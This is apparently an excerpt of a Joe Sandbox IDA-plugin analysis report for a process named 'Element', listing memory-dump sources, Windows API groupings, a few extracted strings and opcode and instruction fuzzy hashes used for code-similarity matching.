                    • Instruction ID: 438379f8817c66a24d4e5870c08a1d01aed3468c9689e1e9e64edc01dc02c90c
                    • Opcode Fuzzy Hash: e14cd25dbeedfe3e74d2bb755ee8c59526504ae7ba32fe4ee3ab8448ffde2d5f
                    • Instruction Fuzzy Hash: DF316135A11A84A1FA15EB55D5783D96365E7B4BA0F084222DE29477D6FE38C9C3C310
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Value$ErrorLast
                    • String ID:
                    • API String ID: 2506987500-0
                    • Opcode ID: c4908968dda7fad744dc83bbee5b7b46b1aa6ac544d159a6541ec4c76f7857dc
                    • Instruction ID: 77b970fcacca1b71b3cda6ba7f46079cd1a1ab46ebd8b82112a48a358666351d
                    • Opcode Fuzzy Hash: c4908968dda7fad744dc83bbee5b7b46b1aa6ac544d159a6541ec4c76f7857dc
                    • Instruction Fuzzy Hash: C81181B830425062FA696775957D3EA66C2AB68BF4F144B259D37077D6EE38C4C3C301
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
                    • String ID:
                    • API String ID: 450394209-0
                    • Opcode ID: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                    • Instruction ID: 4ee550edbe22294e5799d43fab63eff78621585286e2cf17cb4dc67c9082b113
                    • Opcode Fuzzy Hash: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                    • Instruction Fuzzy Hash: 60117F32B196928BEB548F12EC4472A63A1AB85F86F584031DB8DCBB19DF3DDC448B00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 2082702847-0
                    • Opcode ID: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                    • Instruction ID: 7cd04b17c8f27c6d985a62d00b05826a63a3d89e7fb9c4c2a98ede421e8becb0
                    • Opcode Fuzzy Hash: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                    • Instruction Fuzzy Hash: B0216025A0BB9286FE559F61AC142796290AF84FB6F180735DABD867D6DF3CEC048600
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CapsDevice$Release
                    • String ID:
                    • API String ID: 1035833867-0
                    • Opcode ID: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                    • Instruction ID: 80a141298c4920f78b2a4ca9d3acd0d09614e5f11091a640daf496a52eaa7760
                    • Opcode Fuzzy Hash: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                    • Instruction Fuzzy Hash: 09119E35B05B5182EB08CF62AD4802966A1FB88FD2B108079CE8E87B96DF3DD8018740
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: 'wb$3.ex
                    • API String ID: 0-1480206175
                    • Opcode ID: 1b99198ed72eaa34abd7727ecd78d41af92c6b3f55d7c12e802dc6ce0edaaa08
                    • Instruction ID: 566d18123f7a8df1565e1fd7b4542f2f93e56526e59f3e8568815ea61b9aaf4a
                    • Opcode Fuzzy Hash: 1b99198ed72eaa34abd7727ecd78d41af92c6b3f55d7c12e802dc6ce0edaaa08
                    • Instruction Fuzzy Hash: B5C1E132A0468096FB14CF25E4B43FD67A1F7A5B94F405211EF5A57BAAEF78C981CB00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                    • Instruction ID: ffc74824b87a1ec8fe790f4d5df4f36420b148a043397c7b969efbd91235ac34
                    • Opcode Fuzzy Hash: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                    • Instruction Fuzzy Hash: A211BF31B1429282E7148F16BD087696760EB85F96F584170CF8687B53DF7DE858CB80
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                    • Instruction ID: c5e18425044e429db59a6413293ebf4768cb45b7e980ca0cbcc7df6b5fa9f6c9
                    • Opcode Fuzzy Hash: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                    • Instruction Fuzzy Hash: C2111272D16680CAD748CF39DC881293BB2FB58F09B949474C2498B267DF39D49ACB01
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                    • API String ID: 2943138195-757766384
                    • Opcode ID: a9c0f4a58deada827389c446259d37d145cc3e01f8940825d745f2f3ecb991f4
                    • Instruction ID: 704d397afad7e1d779bba41b38a6139d6f161e80e1f2440315d59affa52bfb99
                    • Opcode Fuzzy Hash: a9c0f4a58deada827389c446259d37d145cc3e01f8940825d745f2f3ecb991f4
                    • Instruction Fuzzy Hash: CC717D76601B45B4FB14DF28E8782EC77A9B729784F844526CE4947BA5DB3CC2D2CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: HandleModulelstrcatlstrcpy
                    • String ID: '#$l
                    • API String ID: 1703669419-2470870263
                    • Opcode ID: 7ab6c8b82b312c050fc5c76860ade17743de0f4200b3867565fef881cdd432d4
                    • Instruction ID: fb9d54293adf4d6ee58af72de7b143d78c80df75dd3000443a38730cb37ed374
                    • Opcode Fuzzy Hash: 7ab6c8b82b312c050fc5c76860ade17743de0f4200b3867565fef881cdd432d4
                    • Instruction Fuzzy Hash: DA51F732715281A6FB65EB15D8387EA77A1F7A4F84F044225DE4A87785FB3CC886C710
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: #$E$O
                    • API String ID: 3215553584-248080428
                    • Opcode ID: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                    • Instruction ID: 7f16355bd7e80969399ddd681c72c9aef2c878a6aa7d19f7e4171299e646e0f5
                    • Opcode Fuzzy Hash: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                    • Instruction Fuzzy Hash: F6416C22B1AB6195EF518F229C406BD23A4BF54F89F084132EE8D87BD9DF3DE8418300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                    • String ID: bad locale name
                    • API String ID: 2967684691-1405518554
                    • Opcode ID: c0a4caa8a67abd6b4cdbe45affb843424099f781defdef61d71a60ee2b1f111b
                    • Instruction ID: 0b1aa091ac672b0ab752165d987d5ab202494d6e4a6abd96cd30edb1f688dac8
                    • Opcode Fuzzy Hash: c0a4caa8a67abd6b4cdbe45affb843424099f781defdef61d71a60ee2b1f111b
                    • Instruction Fuzzy Hash: EC417D32B06B80A9FB14DFB0D4B43EC33B4EBA0788F0441559E4A67A5AEF34C996D354
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_Stringwcscpy
                    • String ID: Line %d: $AutoIt -
                    • API String ID: 3135491444-4094128768
                    • Opcode ID: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                    • Instruction ID: 05b511f3e638d597318a7a4a91be671a68fc52fa30781cae650ac8ca3f6dd831
                    • Opcode Fuzzy Hash: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                    • Instruction Fuzzy Hash: 3A415362B0979696EB10EF20DC402B92361FB84B86F800071E5CDC759BDF6CEE09C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: NameName::
                    • String ID: `template-parameter$void
                    • API String ID: 1333004437-4057429177
                    • Opcode ID: dec973f20da25776df6c2f943d94ae8085c6cbcf07865b6c80be27cd95f945d5
                    • Instruction ID: 79c6f3333f062ec3232afa699f7243585fbe35f48d929dad600b15d58372e90b
                    • Opcode Fuzzy Hash: dec973f20da25776df6c2f943d94ae8085c6cbcf07865b6c80be27cd95f945d5
                    • Instruction Fuzzy Hash: D6417B36B00B54E8FB01DBA5D8783ED23B1B728788F945116CE086BB59EF78D58AC740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                    • Instruction ID: bba9542d0bd92a7b17b915feb054760d044ad65d6ac3c1e2ea9ce534eb665336
                    • Opcode Fuzzy Hash: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                    • Instruction Fuzzy Hash: A831C132A097D1CAE7609F24E84476A33A0FB85F91F544239EA9D87B86DF3CD841CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                    • Instruction ID: 62081290961d092161f8002448333922ecb4370feb39c8cd1a1f200e3f0bd5dc
                    • Opcode Fuzzy Hash: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                    • Instruction Fuzzy Hash: 62F01821A1AA8681EF449F11FC9427963A0EF88F91F485075E99FC6666DF7CDC45C700
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                    • Instruction ID: 5989cfd94ff7918a590bc64b9d7b6643fee54badacefaceb1cfe6c04907a50cd
                    • Opcode Fuzzy Hash: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                    • Instruction Fuzzy Hash: 81A1D662F0A7A246FF206F609C013B96699EF40FA6F984635DAAD867C5DF3CDC458700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                    • Instruction ID: efd20322be5824f7f6cd94a80f9dcbdbbb00192717a87c8ca99de98737e8d669
                    • Opcode Fuzzy Hash: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                    • Instruction Fuzzy Hash: 8981CF22A1A66285F7209F299C806BD37A0BB44F56F444935DE8E977D5DF3CEC46C320
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                    • String ID:
                    • API String ID: 3659116390-0
                    • Opcode ID: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
                    • Instruction ID: 47accc984356ba5c0a194ca8e1cc95a8534c6dae3da3f9fce6a0810fe5f606e7
                    • Opcode Fuzzy Hash: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
                    • Instruction Fuzzy Hash: AE51DF32A15A6189EB10CF65EC543AC7BB0FB84F99F048535DE8A87AD9DF38D942C710
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: shared_ptr$ExclusiveLock$AcquireErrorHandleLastModule$Release
                    • String ID:
                    • API String ID: 2272401952-0
                    • Opcode ID: d5423143b292757ad6b5e2b7c9bb8f3a16e6b7f313ded1b2de9395e14086c294
                    • Instruction ID: 39f547b059f51185af5ca0922adf2c0cc6b4694fea7c72441b962c2938249e4d
                    • Opcode Fuzzy Hash: d5423143b292757ad6b5e2b7c9bb8f3a16e6b7f313ded1b2de9395e14086c294
                    • Instruction Fuzzy Hash: 64516532615684A5EB60E725F8743DAB7E5E3D8780F404635AE8D83BA9EE3CC585CF00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocString
                    • String ID:
                    • API String ID: 262959230-0
                    • Opcode ID: 12b3f27c69990bbef1c792c2cc15a8786e3903b19534a9beeaaf1336ac052df7
                    • Instruction ID: ebfccc009b2aaa6cc392e018b857aaf9b4226bd1960bdb7ff7f9a98b93cf5d9f
                    • Opcode Fuzzy Hash: 12b3f27c69990bbef1c792c2cc15a8786e3903b19534a9beeaaf1336ac052df7
                    • Instruction Fuzzy Hash: 39419F31200744B9FB549F72A57C3E96294E768BA4F184624AE69877D5DF3CD4C38B40
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
                    • Instruction ID: 6f13351e5c90698fd367bef8cdf5228ef43bc56301ff76751373d93c15da15da
                    • Opcode Fuzzy Hash: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
                    • Instruction Fuzzy Hash: CC51D532A0A79285E720AF219C4057977A8EF44FA2F584235DAEE876D5DF3CDC51C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AddressProc
                    • String ID:
                    • API String ID: 190572456-0
                    • Opcode ID: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
                    • Instruction ID: 81c2fcd195b66614eabc703e0b10940703d1dc44b7cb4496acb10d88093a3162
                    • Opcode Fuzzy Hash: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
                    • Instruction Fuzzy Hash: CF418D22B1BAA281FA158F56AC04675A395BF48FA3F494535DD9ECB7D5EF3CE8008300
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
